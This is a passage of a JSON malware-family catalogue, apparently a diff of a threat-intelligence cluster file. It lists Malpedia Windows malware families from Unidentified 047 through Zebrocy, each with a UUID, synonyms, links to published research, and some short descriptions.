- "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" - ] - }, - "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", - "value": "Unidentified 047", - "description": "RAT written in Delphi used by Patchwork APT." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ] - }, - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", - "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" - ] - }, - "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", - "value": "Unidentified 049 (Lazarus/RAT)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", - "https://twitter.com/CDA/status/1014144988454772736" - ] - }, - "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" - ] - }, - "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", - "value": "Unidentified 052", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - }, - "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", - "value": "Unidentified 053 (Wonknu?)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", - "https://twitter.com/struppigel/status/810753660737073153", - "https://twitter.com/bartblaze/status/976188821078462465" - ] - }, - "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", - "value": "Unlock92", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Rombrast" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", - "https://twitter.com/ulexec/status/1005096227741020160" - ] - }, - "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", - "value": "UPAS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", - "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://secrary.com/ReversingMalware/Upatre/" - ] - }, - "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", - "value": "Upatre", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" - ] - }, - "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", - "value": "Urausy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bebloh", - "Shiotob" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", - "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" - ] - }, - "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", - "value": "UrlZone", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Snake" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos" - ] - }, - "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Catch", - "grabnew", - "NeverQuest" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", - "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", - "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", - "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", - "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] - }, - "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", - "value": "Vawtrak", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", - "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" - ] - }, - "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", - "value": "Velso Ransomware", - "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. " - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", - "https://twitter.com/JaromirHorejsi/status/813690129088937984" - ] - }, - "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", - "value": "Venus Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" - ] - }, - "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", - "value": "Vermin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", - "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" - ] - }, - "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", - "value": "Vflooder", - "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", - "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" - ] - }, - "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", - "value": "virdetdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", - "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/" - ] - }, - "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", - "value": "Virut", - "description": "" - }, - { - "meta": { - "synonyms": [ - "VMzeus", - "ZeusVM", - "Zberp" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", - "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" - ] - }, - "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", - "value": "VM Zeus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", - "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" - ] - }, - "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", - "value": "Vobfus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FALLCHILL", - "Manuscrypt" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", - "https://www.us-cert.gov/ncas/alerts/TA17-318B" - ] - }, - "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", - "value": "Volgmer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", - "https://twitter.com/malware_traffic/status/821483557990318080" - ] - }, - "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", - "value": "Vreikstadi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", - "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", - "http://www.xylibox.com/2013/01/vskimmer.html", - "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" - ] - }, - "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", - "value": "vSkimmer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", - "https://attack.mitre.org/wiki/Group/G0022" - ] - }, - "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", - "value": "w32times", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wcry", - "WannaCry", - "Wana Decrypt0r" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", - "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", - "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", - "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html" - ] - }, - "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterminer", - "https://blog.minerva-labs.com/waterminer-a-new-evasive-crypto-miner" - ] - }, - "uuid": "d536931e-ad4f-485a-b93d-fe05f23a9367", - "value": "WaterMiner", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "d238262a-4832-408f-9926-a7174e671b50", - "value": "WaterSpout", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "e57c677f-0117-4e23-8c3f-a772ed809f4c", - "value": "WebC2-AdSpace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", - "value": "WebC2-Bolid", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", - "value": "WebC2-Yahoo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] - }, - "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] - }, - "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", - "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] - }, - "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-nmap-script", - "https://github.com/TKCERT/winnti-suricata-lua", - "https://github.com/TKCERT/winnti-detector" - ] - }, - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] - }, - "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", - "https://secrary.com/ReversingMalware/WMIGhost/", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", - "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] - }, - "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", - "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] - }, - "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" - ] - }, - "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "" - }, - { - "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" - ] - }, - "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", - "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] - }, - "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" - ] - }, - "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" - ] - }, - "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", - "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", - "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] - }, - "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" - ] - }, - "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", - "value": "XP PrivEsc (CVE-2014-4076)", - "description": "" - }, - { - "meta": { - "synonyms": [ - "nokian" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] - }, - "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "" - }, - { - "meta": { - "synonyms": [ - "xaps" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - "https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/", - "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", - "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", - "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" - ] - }, - "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" - ] - }, - "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "" - }, - { - "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "" - }, - { - "meta": { - "synonyms": [ - "bbsinfo", - "aumlib" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", - "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" - ] - }, - "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", - "value": "yayih", - "description": "" - }, - { - "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", - "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] - }, - "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", - "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", - "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] - }, - "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Zekapab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] - }, - "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] - }, - "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 